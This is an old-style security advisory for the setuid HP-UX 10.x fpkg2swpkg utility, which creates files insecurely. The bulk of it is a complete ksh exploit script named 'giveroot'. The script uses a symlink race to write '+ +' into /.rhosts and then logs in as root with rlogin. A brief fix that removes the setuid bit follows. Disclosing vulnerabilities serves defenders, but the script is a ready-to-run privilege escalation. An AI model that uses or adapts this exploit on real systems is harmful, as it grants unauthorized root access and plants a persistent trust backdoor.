COMMAND

    /usr/sbin/fpkg2swpkg

SYSTEMS AFFECTED

    HP/UX 10.X

PROBLEM

    The HP-UX 10.x  fpkg2swpkg(1m) program is  used to translate  fpkg
    (HP-UX 9.x)  network media  or Product  Specification Files (PSFs)
    to  SD  swpackage  (HP-UX  10.x)  PSFs.   The  fpkg2swpkg  program
    creates files  in an  insecure manner.   As this  program executes
    with root privileges, it is possible for local users to create  or
    append to arbitrary files on the system.  Local users may be  able
    to create or append  to arbitrary files on  the system.  This  can
    be leveraged to gain root privileges.

    #!/bin/ksh
    # giveroot Version 1.1 (C) 1996 Dog Catcher
    # gives you root by poking + + into /.rhosts
    # this version even works on mode 600 /.rhosts
    # tested on HP/UX 10.01

    # setup stuff
    FILE=/tmp/fpkg2swpk
    LOG=/tmp/fpkg2swpkg.log
    DUMMY=/tmp/"`echo '\n+ +'`"
    SUCKER=/usr/sbin/fpkg2swpkg
    RHOSTS=/.rhosts

    # naughty bits
    touch ${FILE}
    rm -f ${LOG}
    ln -s ${RHOSTS} ${LOG}
    ln -s ${SUCKER} "${DUMMY}"
    "${DUMMY}" ${FILE}

    # tidy up
    rm -f ${FILE} "${DUMMY}" ${LOG}

    # i wanna hash prompt
    rlogin `uname -n` -l root

SOLUTION

    Remove setuid and execute permissions

        # chmod 400 /usr/sbin/fpkg2swpkg
        # ls -l /usr/sbin/fpkg2swpkg
        -r--------   1 root bin    57344 May 30 1996 /usr/sbin/fpkg2swpkg